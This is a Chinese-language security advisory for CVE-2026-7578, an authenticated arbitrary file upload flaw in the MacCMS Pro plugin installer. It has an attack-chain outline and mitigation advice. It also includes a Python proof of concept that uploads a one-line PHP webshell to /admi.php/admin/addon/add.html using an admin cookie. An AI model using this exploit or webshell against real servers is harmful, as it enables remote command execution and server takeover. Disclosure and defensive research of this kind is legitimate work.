CVE-2026-7578 CVSS 4.7 中危

CVE-2026-7578 MacCMS Pro插件安装任意文件上传漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7578

漏洞类型

任意文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

MacCMS Pro

漏洞概述

MacCMS Pro 2022.1.3及之前版本存在安全漏洞。该漏洞位于插件安装处理组件，由于install函数存在缺陷，攻击者可利用/admi.php/admin/addon/add.html路径，在拥有高权限的情况下执行不受限制的文件上传操作。此漏洞可被远程利用，需尽快修复。

技术细节

该漏洞位于MacCMS Pro的插件安装处理组件中，具体受影响路径为/admi.php/admin/addon/add.html。由于对install函数的输入验证机制存在缺陷，导致攻击者在拥有高权限账号（PR:H）的情况下，能够绕过服务器端的安全检查，执行不受限制的文件上传操作。攻击过程无需用户交互（UI:N），可通过网络远程发起（AV:N）。虽然CVSS基础评分为4.7（中危），攻击者利用此漏洞上传Webshell或恶意脚本后，可能导致服务器权限被窃取，造成机密性泄露、数据篡改及服务中断等严重后果。目前该漏洞利用代码已公开，厂商尚未响应。

攻击链分析

STEP 1

侦查

攻击者识别运行MacCMS Pro的目标系统，并确定版本号为2022.1.3或更低。

STEP 2

获取凭证

由于CVSS向量要求高权限（PR:H），攻击者需要通过钓鱼、暴力破解或其他漏洞获取管理员账号的Cookie或Session。

STEP 3

漏洞利用

攻击者使用管理员Session向/admi.php/admin/addon/add.html发送POST请求，利用install函数的缺陷上传恶意的PHP文件（如Webshell）。

STEP 4

执行代码

攻击者访问已上传的文件路径，在服务器端执行任意系统命令，从而控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: MacCMS Pro Unrestricted File Upload (CVE-2026-7578)
# Description: Uploads a malicious file via the vulnerable addon installation handler.

url = "http://target-ip"
login_cookie = "PHPSESSID=admin_session_id;" # Requires High Privilege (Admin)

# Vulnerable endpoint
upload_url = f"{url}/admi.php/admin/addon/add.html"

# Prepare malicious PHP file
files = {
    'file': ('exploit.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
}

headers = {
    'Cookie': login_cookie,
    'User-Agent': 'Mozilla/5.0 (CVE-Analysis)'
}

try:
    response = requests.post(upload_url, files=files, headers=headers)
    if response.status_code == 200:
        print("[+] File uploaded successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Failed. Status Code: {response.status_code}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

MacCMS Pro <= 2022.1.3

防御指南

临时缓解措施

建议暂时禁用插件安装功能或重命名/删除受影响的/addon/add.html文件。同时，加强管理员账户安全策略，检查服务器日志及上传目录中是否存在可疑的Webshell文件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7578
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7578
3 Details https://www.cvedetails.com/cve/CVE-2026-7578/
4 VulDB https://vuldb.com/cve/CVE-2026-7578
5 Link https://github.com/qingyun985/Cyber-Security/issues/1
6 Link https://vuldb.com/submit/792283
7 Link https://vuldb.com/vuln/360419
8 Link https://vuldb.com/vuln/360419/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表